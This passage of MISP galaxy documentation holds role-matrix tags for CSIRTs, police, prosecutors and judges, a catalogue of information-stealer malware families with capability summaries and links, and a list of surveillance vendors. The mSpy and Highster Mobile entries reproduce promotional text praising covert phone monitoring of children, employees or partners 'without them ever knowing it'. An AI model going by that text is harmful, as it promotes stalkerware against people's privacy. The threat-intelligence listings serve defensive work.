The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [C]"

In the case of disagreement, the final say for an investigation - Judiciary - [I]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [I]"

In the case of disagreement, the final say for an investigation - Judiciary - [S]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [S]"

In the case of disagreement, the final say for an investigation - Prosecutors - [R]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [R]"

In the case of disagreement, the final say for an investigation - Prosecutors - [C]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [C]"

In the case of disagreement, the final say for an investigation - Prosecutors - [I]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [I]"

In the case of disagreement, the final say for an investigation - Prosecutors - [S]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [S]"

Authorizing the investigation carried out by the LE - LEA - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [R]"

Authorizing the investigation carried out by the LE - LEA - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [C]"

Authorizing the investigation carried out by the LE - LEA - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [I]"

Authorizing the investigation carried out by the LE - LEA - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [S]"

Authorizing the investigation carried out by the LE - Judiciary - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [R]"

Authorizing the investigation carried out by the LE - Judiciary - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [C]"

Authorizing the investigation carried out by the LE - Judiciary - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [I]"

Authorizing the investigation carried out by the LE - Judiciary - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [S]"

Authorizing the investigation carried out by the LE - Prosecutors - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [R]"

Authorizing the investigation carried out by the LE - Prosecutors - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [C]"

Authorizing the investigation carried out by the LE - Prosecutors - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [I]"

Authorizing the investigation carried out by the LE - Prosecutors - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [S]"

Systems recovery - CSIRT - [R]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [R]"

Systems recovery - CSIRT - [C]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [C]"

Systems recovery - CSIRT - [I]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [I]"

Systems recovery - CSIRT - [S]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [S]"

Protecting the constituency - CSIRT - [R]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [R]"

Protecting the constituency - CSIRT - [C]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [C]"

Protecting the constituency - CSIRT - [I]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [I]"

Protecting the constituency - CSIRT - [S]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [S]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [R]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [R]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [C]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [C]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [I]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [I]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [S]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [S]"

Analysis and interpretation of collected evidence - LEA - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [R]"

Analysis and interpretation of collected evidence - LEA - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [C]"

Analysis and interpretation of collected evidence - LEA - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [I]"

Analysis and interpretation of collected evidence - LEA - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [S]"

Analysis and interpretation of collected evidence - Judiciary - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [R]"

Analysis and interpretation of collected evidence - Judiciary - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [C]"

Analysis and interpretation of collected evidence - Judiciary - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [I]"

Analysis and interpretation of collected evidence - Judiciary - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [S]"

Analysis and interpretation of collected evidence - Prosecutors - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [R]"

Analysis and interpretation of collected evidence - Prosecutors - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [C]"

Analysis and interpretation of collected evidence - Prosecutors - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [I]"

Analysis and interpretation of collected evidence - Prosecutors - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [S]"

Requesting testimonies from CSIRTs and LE - Judiciary - [R]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [R]"

Requesting testimonies from CSIRTs and LE - Judiciary - [C]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [C]"

Requesting testimonies from CSIRTs and LE - Judiciary - [I]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [I]"

Requesting testimonies from CSIRTs and LE - Judiciary - [S]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [S]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [R]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [R]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [C]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [C]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [I]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [I]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [S]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [S]"

Admitting and assessing the evidence - Judiciary - [R]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [R]"

Admitting and assessing the evidence - Judiciary - [C]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [C]"

Admitting and assessing the evidence - Judiciary - [I]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [I]"

Admitting and assessing the evidence - Judiciary - [S]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [S]"

Admitting and assessing the evidence - Prosecutors - [R]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [R]"

Admitting and assessing the evidence - Prosecutors - [C]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [C]"

Admitting and assessing the evidence - Prosecutors - [I]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [I]"

Admitting and assessing the evidence - Prosecutors - [S]

Evidence in a criminal trial

The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [S]"

Judging who committed a crime - Judiciary - [R]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [R]"

Judging who committed a crime - Judiciary - [C]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [C]"

Judging who committed a crime - Judiciary - [I]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [I]"

Judging who committed a crime - Judiciary - [S]

Technical knowledge and knowledge of the legal framework

The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [S]"

Assessing incident damage and cost - CSIRT - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [R]"

Assessing incident damage and cost - CSIRT - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [C]"

Assessing incident damage and cost - CSIRT - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [I]"

Assessing incident damage and cost - CSIRT - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [S]"

Assessing incident damage and cost - LEA - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [R]"

Assessing incident damage and cost - LEA - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [C]"

Assessing incident damage and cost - LEA - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [I]"

Assessing incident damage and cost - LEA - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [S]"

Assessing incident damage and cost - Judiciary - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [R]"

Assessing incident damage and cost - Judiciary - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [C]"

Assessing incident damage and cost - Judiciary - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [I]"

Assessing incident damage and cost - Judiciary - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [S]"

Assessing incident damage and cost - Prosecutors - [R]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [R]"

Assessing incident damage and cost - Prosecutors - [C]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [C]"

Assessing incident damage and cost - Prosecutors - [I]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [I]"

Assessing incident damage and cost - Prosecutors - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [S]"

Reviewing the response and update policies and procedures - CSIRT - [R]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [R]"

Reviewing the response and update policies and procedures - CSIRT - [C]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [C]"

Reviewing the response and update policies and procedures - CSIRT - [I]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [I]"

Reviewing the response and update policies and procedures - CSIRT - [S]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [S]"

Stealer

A list of malware stealer..

Stealer is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

raw-data

Nocturnal Stealer

It is designed to steal data found within multiple Chromium and Firefox based browsers, it can also steal many popular cryptocurrency wallets as well as any saved FTP passwords within FileZilla. Nocturnal Stealer uses several anti-VM and anti-analysis techniques, which include but are not limited to: environment fingerprinting, checking for debuggers and analyzers, searching for known virtual machine registry keys, and checking for emulation software.

The tag is: misp-galaxy:stealer="Nocturnal Stealer"

Nocturnal Stealer has relationships with:

  • similar: misp-galaxy:malpedia="Nocturnal Stealer" with estimative-language:likelihood-probability="likely"

Table 11696. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

https://www.bleepingcomputer.com/news/security/hookads-malvertising-installing-malware-via-the-fallout-exploit-kit/

https://traffic.moe/2018/11/10/index.html

TeleGrab

The first version stole browser credentials and cookies, along with all text files it can find on the system. The second variant added the ability to collect Telegram’s desktop cache and key files, as well as login information for the video game storefront Steam.

The tag is: misp-galaxy:stealer="TeleGrab"

Table 11697. Table References

Links

https://blog.talosintelligence.com/2018/05/telegrab.html

AZORult

It is able to steal accounts from different software, such as, Firefox password Internet Explorer/Edge Thunderbird Chrome/Chromium and many more. It is also able to (1) list all installed software, (2) list processes, (3) Get information about the machine name (CPU type, Graphic card, size of memory), (4) take screen captures, (5) Steal cryptomoney wallet from Electrum, MultiBit, monero-project, bitcoin-qt.

The tag is: misp-galaxy:stealer="AZORult"

Table 11698. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://blog.minerva-labs.com/analyzing-an-azorult-attack-evasion-in-a-cloak-of-multiple-layers

https://malware.lu/articles/2018/05/04/azorult-stealer.html

Vidar

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

The tag is: misp-galaxy:stealer="Vidar"

Table 11699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Ave Maria

Information stealer which uses AutoIT for wrapping.

The tag is: misp-galaxy:stealer="Ave Maria"

Table 11700. Table References

Links

https://blog.yoroi.company/research/the-ave_maria-malware/

HackBoss

A cryptocurrency-stealing malware distributed through Telegram

The tag is: misp-galaxy:stealer="HackBoss"

Table 11701. Table References

Links

https://decoded.avast.io/romanalinkeova/hackboss-a-cryptocurrency-stealing-malware-distributed-through-telegram/

https://github.com/avast/ioc/tree/master/HackBoss

Prynt Stealer

Prynt Stealer is an information stealer that has the ability to capture credentials that are stored on a compromised system including web browsers, VPN/FTP clients, as well as messaging and gaming applications. Its developer based the malware code on open source projects including AsyncRAT and StormKitty. Prynt Stealer uses Telegram to exfiltrate data that is stolen from victims. Its author added a backdoor Telegram channel to collect the information stolen by other criminals.

The tag is: misp-galaxy:stealer="Prynt Stealer"

Prynt Stealer has relationships with:

  • variant-of: misp-galaxy:stealer="DarkEye" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="WorldWind" with estimative-language:likelihood-probability="very-likely"

Table 11702. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

DarkEye

Nearly identical to Prynt Stealer with a few differences. DarkEye is not sold or mentioned publicly, however, it is bundled as a backdoor with a “free” Prynt Stealer builder.

The tag is: misp-galaxy:stealer="DarkEye"

DarkEye has relationships with:

  • variant-of: misp-galaxy:stealer="Prynt Stealer" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="WorldWind" with estimative-language:likelihood-probability="very-likely"

Table 11703. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

WorldWind

Prynt Stealer variant that appear to be written by the same author. It is nearly identical to Prynt Stealer with a few minor differences. While Prynt Stealer is the most popular brand name for selling the malware, WorldWind payloads are the most commonly observed in-the-wild.

The tag is: misp-galaxy:stealer="WorldWind"

WorldWind has relationships with:

  • variant-of: misp-galaxy:stealer="Prynt Stealer" with estimative-language:likelihood-probability="very-likely"

  • variant-of: misp-galaxy:stealer="DarkEye" with estimative-language:likelihood-probability="very-likely"

Table 11704. Table References

Links

https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

DarkCloud Stealer

Stealer is written in Visual Basic.

The tag is: misp-galaxy:stealer="DarkCloud Stealer"

DarkCloud Stealer has relationships with:

  • variant-of: misp-galaxy:malpedia="BluStealer" with estimative-language:likelihood-probability="very-likely"

Table 11705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/

Album Stealer

The Zscaler ThreatLabz research team has spotted a new information stealer named Album. Album Stealer is disguised as a photo album that drops decoy adult images while performing malicious activity in the background. The threat group launching these attacks may be located in Vietnam.

The tag is: misp-galaxy:stealer="Album Stealer"

Table 11706. Table References

Links

https://www.zscaler.com/blogs/security-research/album-stealer-targets-facebook-adult-only-content-seekers

Rhadamanthys

According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.

The tag is: misp-galaxy:stealer="Rhadamanthys"

Table 11707. Table References

Links

https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88

https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/

https://www.malware-traffic-analysis.net/2023/01/03/index.html

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/

Sordeal-Stealer

Python-based Stealer including Discord, Steam…​

The tag is: misp-galaxy:stealer="Sordeal-Stealer"

Sordeal-Stealer is also known as:

  • Sordeal

  • Sordeal Stealer

Table 11708. Table References

Links

https://github.com/SOrdeal/Sordeal-Stealer

Mars Stealer

Mars stealer is an improved successor of Oski Stealer, supporting stealing from current browsers and targeting crypto currencies and 2FA plugins. Mars Stealer written in ASM/C using WinApi, weight is 95 kb. Uses special techniques to hide WinApi calls, encrypts strings, collects information in the memory, supports secure SSL-connection with C&C, doesn’t use CRT, STD.

The tag is: misp-galaxy:stealer="Mars Stealer"

Mars Stealer has relationships with:

  • successor-of: misp-galaxy:stealer="Oski Stealer" with estimative-language:likelihood-probability="very-likely"

Table 11709. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer

https://3xp0rt.com/posts/mars-stealer/

https://cyberint.com/blog/research/mars-stealer/

https://isc.sans.edu/diary/rss/28468

https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468

https://blog.morphisec.com/threat-research-mars-stealer

https://cert.gov.ua/article/38606

https://www.malwarebytes.com/blog/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique

https://blog.sekoia.io/mars-a-red-hot-information-stealer/

https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

https://resources.infosecinstitute.com/topics/malware-analysis/mars-stealer-malware-analysis/

https://www.microsoft.com/en-us/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

https://x-junior.github.io/malware%20analysis/2022/05/19/MarsStealer.html

https://www.kelacyber.com/information-stealers-a-new-landscape/

https://cyble.com/blog/fake-atomic-wallet-website-distributing-mars-stealer/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view

https://threatmon.io/mars-stealer-malware-analysis-2022/

https://threatmon.io/storage/mars-stealer-malware-analysis-2022.pdf

https://3xp0rt.com/posts/mars-stealer/forum.png

WARPWIRE

WARPWIRE is a JavaScript-based credential stealer

The tag is: misp-galaxy:stealer="WARPWIRE"

Table 11711. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

Surveillance Vendor

List of vendors selling surveillance technologies including malware, interception devices or computer exploitation services..

Surveillance Vendor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Kape Technologies

Kape Technologies is better known by the name under which they were formerly incorporated - "Crossrider" but make no mistake they are the same company which became notorious as an adware/malware producer. Kape Technologies was originally known as Crossrider until the name change in 2018. The reason for that was, as CEO Ido Erlichman put it, “strong association to the past activities of the company.” Perhaps that refers to infecting users’ devices with malware and adware, considered “high-risk” by Symantec and Malwarebytes. If that wasn’t enough, Crossrider’s Founder and first CEO Koby Menachemi, was part of Unit 8200 – something that can be called Israel’s NSA. Another key person, Teddy Sagi, who is the main investor in both Crossrider and Kape Technologies, is mentioned in the Panama Papers.

The tag is: misp-galaxy:surveillance-vendor="Kape Technologies"

Kape Technologies is also known as:

  • Kape

  • Crossrider

Table 11712. Table References

Links

https://telegra.ph/Private-Internet-Access-VPN-acquired-by-malware-business-founded-by-former-Israeli-spies-12-01

NSO group

NSO Group Technologies is an Israeli technology firm known for its Pegasus spyware enabling the remote surveillance of smartphones. It was founded in 2010 by Niv Carmi, Omri Lavie, and Shalev Hulio. It reportedly employed almost 500 people as of 2017, and is based in Herzliya, near Tel Aviv.

The tag is: misp-galaxy:surveillance-vendor="NSO group"

NSO group is also known as:

  • Q-Cyber

  • Circles

Table 11713. Table References

Links

https://en.wikipedia.org/wiki/NSO_Group

Hacking Team

HackingTeam is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its "Remote Control Systems" enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and camera on target computers. The company has been criticized for providing these capabilities to governments with poor human rights records, though HackingTeam states that they have the ability to disable their software if it is used unethically. The Italian government has restricted their license to do business with countries outside Europe. HackingTeam employs around 40 people in its Italian office, and has subsidiary branches in Annapolis, Washington, D.C., and Singapore. Its products are in use in dozens of countries across six continents.

The tag is: misp-galaxy:surveillance-vendor="Hacking Team"

Hacking Team is also known as:

  • Memento Labs

Table 11714. Table References

Links

https://en.wikipedia.org/wiki/Hacking_Team

Gamma Group

Gamma Group is an Anglo-German technology company that sells surveillance software to governments and police forces around the world. The company has been strongly criticised by human rights organisations for selling its FinFisher software to undemocratic regimes such as Egypt and Bahrain.

The tag is: misp-galaxy:surveillance-vendor="Gamma Group"

Gamma Group is also known as:

  • Gamma International

Table 11715. Table References

Links

https://en.wikipedia.org/wiki/Gamma_Group

FlexiSPY

Flexispy is an application that can be considered as a trojan, based on Symbian. The program sends all information received and sent from the smartphone to a Flexispy server. It was originally created to protect children and spy on adulterous spouses.

The tag is: misp-galaxy:surveillance-vendor="FlexiSPY"

mSpy

mSpy is probably the most popular monitoring software on the market today. It is designed for parents who want to track their children’s online activity. Using mSpy is easy — just download and install a hidden app on your child’s phone and let it do its thing in the background. mSpy is available for iOS and Android, and has a web-based control panel that allows you to remotely monitor activity on your child’s device, including texts, instant messages, phone calls and social media use on Snapchat or Facebook. It also allows you to track the location of your child’s device on a map. The best thing about mSpy is that it works on non-jailbroken iPhones. Do note that some of its features, including email tracking and instant messenger monitoring, are only available on a rooted Android smartphone. If you don’t know how to root an Android device, you might want to consider using a spy app like Highster Mobile. This app lets you spy on Android phone without rooting.

The tag is: misp-galaxy:surveillance-vendor="mSpy"

Table 11716. Table References

Links

https://www.bestphonespy.com/mspy-review/

Highster Mobile

Highster Mobile is a cell phone spy and monitoring software that allows you to secretly monitor your children, employees, or loved ones without them ever knowing it. The app is available for both Android and iOS devices and is developed by ILF Mobile Apps, a company based in Bohemia, New York, that specializes in mobile security.

The tag is: misp-galaxy:surveillance-vendor="Highster Mobile"

Table 11717. Table References

Links

https://www.bestphonespy.com/highster-mobile-review/

Mobile Spy

